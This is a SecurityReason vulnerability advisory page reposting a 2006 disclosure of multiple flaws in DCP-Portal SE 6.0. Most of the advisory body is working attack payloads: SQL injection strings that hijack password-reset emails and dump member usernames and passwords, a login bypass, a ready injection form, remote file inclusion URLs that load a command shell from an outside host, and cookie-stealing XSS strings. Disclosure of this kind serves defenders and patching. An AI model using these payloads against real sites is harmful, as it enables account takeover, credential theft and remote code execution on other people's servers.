|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 1585 CVE : CVE-2006-4836 CVE : CVE-2006-4838 CVE : CVE-2006-4837 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : HACKERS PAL Published : 19.09.2006
Advisory Content : Hello,, DCP-Portal SE 6.0 multiple injections Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : security (at) soqor (dot) net [email concealed] sql injections if magic_qoutes_gpc = off /*************************************/ lostpassword.php you can recive the reset password email on your email for any user you want :) change youremail (at) yourserver (dot) com [email concealed] to your real example : -1' union select uid ,sex,name,surname,'youremail (at) yourserver (dot) com [email concealed]',birthdate,address,zip,city, country,job,tel,language,hideinfo,list,username,password,signature,admin ,active,date from dcp5_members/* and you will recive email reset password for all the members in this website and if you want to recive the password for speciate user id example uid=1 or change 1 for the userid -1' union select uid ,sex,name,surname,'youremail (at) yourserver (dot) com [email concealed]',birthdate,address,zip,city, country,job,tel,language,hideinfo,list,username,password,signature,admin ,active,date from dcp5_members where uid=1/* --------------------------- login try the user name as ' or uid=1/* or change the uid value for any username you want log with --------------------------- file calendar.php Sql injection by post method ,, try this form :) <form name="hack" action="calendar.php" method=post> <input type=hidden name='year' value="-1' union select uid,username,password,null,null from dcp5_members where uid='1"> <input type=submit> </form> --------------------------- file search.php try one of these ,, bcause the number of columns changes from section to another :) if you searched for (content,news,link,forum) use xx%') union select uid,username,password from dcp5_members/* if you searched for (doc,anns) use xx%') union select uid,username,password,password from dcp5_members/* /*************************************/ Remote File including library/lib.php?root=http://www.soqor.net/tools/cmd.txt? library/editor/editor.php?root=http://www.soqor.net/tools/cmd.txt? /*************************************/ Fill path library/editor/editor.php library/lib.php /*************************************/ Xss admin/inc/footer.inc.php?root_url="><Script>alert(document.cookie);</scr ipt><" admin/inc/footer.inc.php?dcp_version=<Script>alert(document.cookie);</sc ript> admin/inc/header.inc.php?root_url="><Script>alert(document.cookie);</scr ipt><" admin/inc/header.inc.php?page_top_name=<Script>alert(document.cookie);</ script> admin/inc/header.inc.php?page_name=<Script>alert(document.cookie);</scri pt> admin/inc/header.inc.php?page_options=<Script>alert(document.cookie);</s cript> /*************************************/ WwW.SoQoR.NeT  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |